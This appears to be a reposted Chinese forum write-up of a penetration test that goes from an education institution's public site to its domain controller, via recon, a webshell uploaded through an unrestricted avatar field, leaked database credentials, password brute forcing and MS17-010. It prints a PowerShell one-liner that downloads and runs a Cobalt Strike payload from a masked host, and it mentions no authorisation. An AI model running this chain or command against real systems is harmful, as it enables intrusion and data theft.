找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2225|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& l; `3 x( a% w& N3 X% P, ?# [ 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 6 v0 g; k: k3 u; m. i

; S7 r- Z! J- e! v, K2 f/ I

+ n% [ S! l+ G1 `5 z; Z0 Y4 z   6 c; H3 N" }( j

8 b* O) q. B! h+ P$ Q' @

2 ?5 L. |4 j8 p+ e6 A 正文 + J9 \$ |( c$ m

6 X- ^+ k% a9 F

5 J/ q o- Y. f: j( }   8 {( }& H* h3 `

* z' @% B$ b; z8 X! A( U/ Z

: B: t {5 Y7 S: |8 N& o 目标:www.xxxx.com(一家教育机构)
( N0 p! X, f8 v; A2 Q4 [. \+ \5 T
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
/ p- b, J- J0 E% Y2 s

5 a* h( T! v: F0 g: J

1 p/ Q$ }" i3 f0 M# R vshapes=5 c! m( ^) {: L2 W; s

* y: k0 I4 s$ z- B

9 P; y4 k8 l1 W* ~/ V% Q- M$ R 进行了简单的信息搜集
' T/ i! v |% `; V- s0 ^$ y
2 z6 ^; Q4 _! N( x+ P6 s
?& t5 Q, @9 Q' M& \1 s8 d) i, D

# s2 f; A% h2 F

0 @/ y1 X0 }# v5 Q. T 子域名搜集' V5 M! k1 t: F& C: B0 z3 d

/ M8 }2 j+ ?- q# {0 t4 D/ y" q

4 U, ^7 t5 C' l) D) w vshapes= ! W+ R+ }; [) }* s0 b; c3 _* M

% u; Q( ^& ] i5 M7 |) a( }$ z! ?

2 l$ i; t9 R' E6 f fofa找资产
( H* S0 I, G4 E. U o z
1 p, P- I* e$ o- b. b
) R/ d+ B& d5 C# R8 n( f6 r' L

5 R: I S$ X% V0 D6 e6 Q0 I

5 z3 t k; U2 C$ T8 O( P" }* E vshapes=5 B5 s: |1 y, X1 {2 \

* P' W( f( p, B& a& O, t2 Y

5 J& [ y- n, D0 a8 Z, [: H 一共七个资产。去重之后只有两个。
' y I( Y, s+ r. G
# d& ?7 T4 n0 a3 n2 K' i
0 |; x; t7 r- `/ n' X7 j5 ~6 `

; n7 h, L$ y9 G" X7 [

, i) r8 H! Y3 K' J+ }- j/ `" D. U 目录探测- U4 _. W& y0 ^4 p9 Y

0 L" G" g; F- M' y1 j+ J3 Z; d6 [

: U Y! ]- b! w0 O( I; R vshapes=7 v \. V& D& A; t

6 ^' S" u0 z9 z# h* a

) {5 j" a5 \1 D* f) {* I/ E 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
/ J1 G; ]- e+ ^, o: K- F1 Y! @4 K
- j3 v; F" K! {0 y8 D
" C% L5 V9 h) Z2 B

- f2 i0 a$ @, x1 y

2 V! P/ R7 U/ N. d. {# y 我又尝试了通过修改返回包来绕过登录界面" C3 I3 U4 {* O2 F& I7 W

1 ^8 V! Y) S9 ?% A5 x

5 q4 l9 W8 c9 Y# G ]" G& S' r vshapes= * s1 R$ a/ F& P) q3 G, p- {

) F9 x5 O, ]- g" i' I& }# U

% j U8 \3 i) l5 U5 i 还是不行,尝试注入无果 5 m: } Z7 w7 i; v

* t# w: A7 k/ ^- C7 u. }

2 W. M) j/ \; K- m1 I vshapes=! h. q3 t$ Y7 [; |0 r5 f

' D9 Q+ U8 ~7 C" b- X" N$ n4 W3 B

. k/ e+ r: n* V 不过我目录探测出了一处Spring信息泄露
3 C8 l% `5 |2 y2 u6 R1 X% k; W
9 a' ~; U% Z" h) u
3 ~- H2 `( ?0 ?& s

$ T, [1 e3 J+ K }9 C+ r& {

# y; Q# f7 b; O/ V% ^3 Q vshapes=0 m! |, L' U, F7 b9 t! m& ], |

4 A. Q1 z [3 }( u4 l9 V

$ w& X% V9 J6 Z: w1 s0 i4 Y( |6 a 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录) O: B0 N1 L0 ?

! U3 \4 s) I# o0 O, g1 S1 L

0 O- z4 g! i+ p7 I8 {" o vshapes= 5 ^7 P2 _5 b, B6 O# l0 ^

\5 ^- j& t8 N% c9 K

* G1 @7 V. s; B m3 `3 E* d6 i- a 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 , j3 u( d9 \; v) ~/ S2 ^% Q. X

5 F6 a2 y; V8 u3 H4 H$ _

8 A. l* E( k/ x, A vshapes= 5 p. ]0 m/ T7 }- G; l

: Q/ \' d1 Q/ v8 Q! @7 b" G

7 X5 G" F/ @& ~6 |7 L 获取有些师傅到这一步就手机抓包电脑测了。 - B' }; A, S8 ]! D; k, \% B

( c$ o: g) c1 N; x7 G

: r! c( i, v4 b& b9 n: Q3 q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ L% _# e0 k3 c* B% J' }6 a

5 O! J- `. ?0 v* Z7 t3 [

2 l* f) m/ |. Y9 k& l* Q- `3 j$ ` 其中在一个公众号发现了小程序,可以进行注册。 * T" F( K# t7 ^& E6 f9 b

3 ?6 K! r$ s ]5 R. L! J

! o% D% B# \) B& [! d 看到了头像上传,尝试上传获取WebShell , B/ a. I/ \. a2 x

3 P$ |, o. u" \9 g

" Y: Z6 E; ]9 Q: k' b vshapes= ! ~* D9 J8 L& \0 E& F. u _

0 g7 s5 \( ~1 l' N

9 J3 g8 L t* t* X0 s; X 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 }" m" n8 r4 B c

. H" M* V8 N' C+ g3 n4 n e* Z

( `+ R8 f* q+ y) [& n vshapes=0 s5 B6 b7 } [' {" ~

8 p1 r. G" l v: p! d9 l3 f( @

1 u5 `0 _. I7 Q6 A0 p/ [6 P5 R 然后上了大马2 o) L" \7 e3 `& |0 S, A

0 u% s1 j8 f( a( g4 s' n

* k7 ~1 V( w7 d9 [ vshapes=& B1 l& t$ Q$ n( d D) O0 i8 y

' K+ E5 \8 F6 t5 F8 f- q' h

n; l8 d) v3 B+ d6 ?( O$ Y- I vshapes= 8 O6 q3 [. b* E* ~

* w3 F' ~: o- K0 z

/ A: A; l2 P- x8 { 通过翻找文件发现数据库账号密码 h! d- n3 b3 v5 M2 S- x

9 r, [# Z/ N8 S F

. i4 f( r, r# `8 N4 m vshapes= 6 N4 k" q: b6 X6 R- f; ^5 N

- d+ _1 Z" R3 b9 _& c

9 R. d9 X2 ~+ S" L --内网渗透8 [5 _* Q0 A" v; Z! _+ G9 _' z

* \6 W: b0 `0 Y0 Z( _3 I

3 Q5 t* m- ~/ n) F$ S" A 直接通过powershell执行 cs上线 " ~- e/ y% a# ^

/ ?" J7 ^9 O# l; z. d; }/ N

/ ] A* v1 g' a9 o, o+ I! O powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" % }0 c! D5 Z! z

! G. {! w' H' i1 z4 A

' V3 a6 G% N! G% h1 r. U vshapes= 4 F- ^7 }4 z3 w. B1 R$ B c

0 J* }, k) @4 ~3 V% @& `; g! m

3 |" G8 _- ^& V" M1 i/ k 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破$ Q! y% H0 n! d+ M: l& q

) N1 \2 o3 q6 E% `/ h

D$ Z4 J1 z8 U+ p) ?9 z7 l& L) t vshapes= 8 B2 i- Y( H2 t' ~6 I! p- U

! E% w, j; |+ D0 ?$ e9 y% u5 W5 g

$ r6 a) r; z& b& b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& n: H4 G* r, Y0 K8 ~# R
* @; m n, |$ Q% M! K2 g
' R# N) D$ j, z! l
5 [& s ?) }9 C$ t

# F. l' S/ Q9 I1 A f) B

- O# x- H6 ]7 B/ U/ t vshapes= 2 F; V0 C2 i/ u# O5 W

0 ~( R# Q7 e( r3 e. k) X# d

' |; W# o. W& O9 B9 e* l 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
8 T0 J1 x, {4 J3 _
/ J7 E: l+ i& |% y( r
; x. c8 [' i5 m. m

6 J* N0 Z7 \- S" Q* S3 \" Z

( {1 E1 ?* j0 Y vshapes= L8 Y0 g2 j( o ?

3 h: n* T1 k- s* J$ ]$ V- O" P6 D

% s1 J5 u9 Y7 ^9 n( c
# ?8 t: f0 r0 ~3 b, d
* Q$ ~6 A( _% E( e D+ ~
/ A. U# v8 D0 x b* P

& ?4 `9 T& q8 }" F" M* c

# H: z9 J8 S- _0 Z  * W" A: h e/ C# g- z$ s* h

; J7 A' r. c8 S+ g/ x

) j4 t' j- e1 v! ~ 小结 * ~- t5 [" S& q( V9 R' E& _

1 L' }0 E9 T+ u0 y! b

7 w& t4 p9 ]4 A U' f  * r# g7 d% A) k* f4 w. C

9 T. z. p5 M; g/ W# R: ^5 A7 b

* E7 G8 P* _: c 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!7 C! @1 V( h4 N% J5 N/ D

( y' l0 F# `" Z

* C! s3 k- _6 p+ Q. z+ Z  / @0 T. S2 G% }9 {+ h. G$ D

% A, ?* j+ @/ |3 N8 l
    ! V4 M8 R& A* J; L2 W9 ?
  • $ f6 ]7 W3 t% {- b  4 l) K# {0 f) I, M
  • 4 f e0 D+ L O( P0 d. H8 z6 T
  • $ F' a9 i" _ v) `  / X6 R) M/ |8 Z; c7 X
  • 2 ]0 t! q, K4 p- U* v* _( i
' m; a6 `* _: u9 z7 H+ E- Z

0 [8 ~! G9 H$ j; h) V 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* [. S# F, N- V! B4 L" v5 o' ]

9 j2 U/ }) D8 h8 N6 N1 A! r4 q

; W" R; \* ` s& B* R/ h5 P% g$ V  - D( v/ ?3 C5 h# f" T

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表